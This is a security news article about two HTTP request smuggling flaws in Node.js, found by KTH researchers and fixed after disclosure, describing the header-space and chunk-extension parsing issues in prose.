Bad line termination and incorrect parsing of chunk extensions exposed one of two HRS flaws
HTTP request smuggling interferes with how websites process sequences of HTTP requests received from users.
The vulnerabilities were discovered by Mattias Grenfeldt and Asta Olofsson as part of research for a bachelor’s thesis in computer science at the KTH Royal Institute of Technology in Sweden. This has since been rewritten as a conference paper and accepted for IEEE EDOC 2021.
“We set out to look for HTTP request smuggling vulnerabilities in six open source web servers and six open source proxies. Node was one of them, but initially we didn't find any issues in it,” Grenfeldt tells The Daily Swig.
“Some time later, while working on reporting the other issues found during the project, we just stumbled upon these two issues.”
‘Classic HRS technique’
The first, CVE-2021-22959, allows HTTP request smuggling due to spaces in headers, with the HTTP parser accepting requests with a space after the header name and before the colon.
“This is a classic HRS technique,” says Grenfeldt. “Node interprets ‘Content-Length : 5’ as ‘Content-Length: 5’. If combined with a proxy which ignores such headers, but forwards them unmodified, then HRS is possible. There have been many issues in the past similar to this.
“Interestingly, Regilero has also reported this exact issue to Node earlier, together with a bunch of other issues; they were collectively assigned CVE-2016-2086. All of the issues were fixed, except for the space + colon issue.”
Meanwhile, CVE-2021-22960 appears to represent a novel HRS technique, whereby combining bad line termination in one of the proxies investigated and incorrect parsing of chunk extensions in Node allows request smuggling.
Grenfeldt and Olofsson found that the vulnerable proxy looked for a single newline (LF) character to terminate the line containing the chunk size, but didn’t, as is usual, check whether there was a carriage return before the LF.
“Right before this line termination is the place for the seldom used chunk extensions feature. In chunk extensions you can specify extra parameters, like ‘a=b’, after the chunk size. However, parsing for this is rarely implemented in systems and many instead just allow any bytes in this region,” explains Grenfeldt.
“These two problems combined enables us to construct a chunked body that the proxy interprets one way and Node interprets another way. We also found the same server behaviour in three other servers we investigated, making this the most severe problem we found.”
Grenfeldt and Olofsson reported the issues on June 19 and 20, with Node releasing a fix on October 12.